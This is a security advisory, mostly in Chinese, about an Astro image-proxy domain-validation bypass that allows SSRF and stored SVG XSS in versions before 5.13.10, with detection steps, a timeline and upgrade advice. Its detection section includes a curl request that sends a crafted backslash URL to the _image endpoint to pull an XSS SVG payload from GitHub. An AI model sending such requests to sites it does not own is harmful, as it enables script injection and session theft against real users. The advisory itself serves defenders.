Astro 的图像代理域名验证绕过导致 SSRF 和潜在的 XSS

该 XSS 漏洞允许攻击者通过在 Astro 网站的图像处理功能中注入恶意代码来执行任意 JavaScript 代码。攻击者可以利用此漏洞窃取用户的 Cookie 和会话令牌，从而完全控制用户的帐户。此外，攻击者还可以利用此漏洞将用户重定向到恶意网站，或在网站上显示虚假信息。由于该漏洞是针对先前修复程序的绕过，因此可能存在大量已部署的系统容易受到攻击。攻击者可以通过构造特殊 URL，利用 _image 端点，绕过原始修复，注入恶意 SVG 代码。

Websites and applications built with Astro that are running versions prior to 5.13.10 are at risk. This includes those relying on image processing or serving content dynamically. Shared hosting environments using Astro are particularly vulnerable, as they may not have control over the underlying server configuration or the ability to quickly apply updates.

• nodejs: Monitor application logs for requests containing backslashes in image URLs, particularly those referencing raw.githubusercontent.com. Use grep to search for patterns like \raw.githubusercontent.com in access logs.

grep '\\raw.githubusercontent.com' /var/log/nginx/access.log

• generic web: Use curl to test image endpoints with crafted URLs containing backslashes. Check for JavaScript execution in the response.

curl 'https://your-astro-site/_image?href=\\raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg' -s | grep -i '<script>'

1. 2025-10-28Disclosure

   disclosure

2. 2025-10-28PoC

   poc

1. 已保留2025-09-22
2. 发布日期2025-10-28
3. 修改日期2025-10-29
4. EPSS 更新日期2026-03-23

最有效的缓解措施是立即升级到 Astro 5.13.10 或更高版本。如果无法立即升级，可以考虑使用 Web 应用防火墙 (WAF) 来过滤包含恶意代码的请求。此外，还可以配置服务器，以阻止对 _image 端点的直接访问，或者对请求进行严格的输入验证，以防止注入恶意代码。在升级后，请检查网站日志，以确认是否存在任何可疑活动，并验证修复是否有效。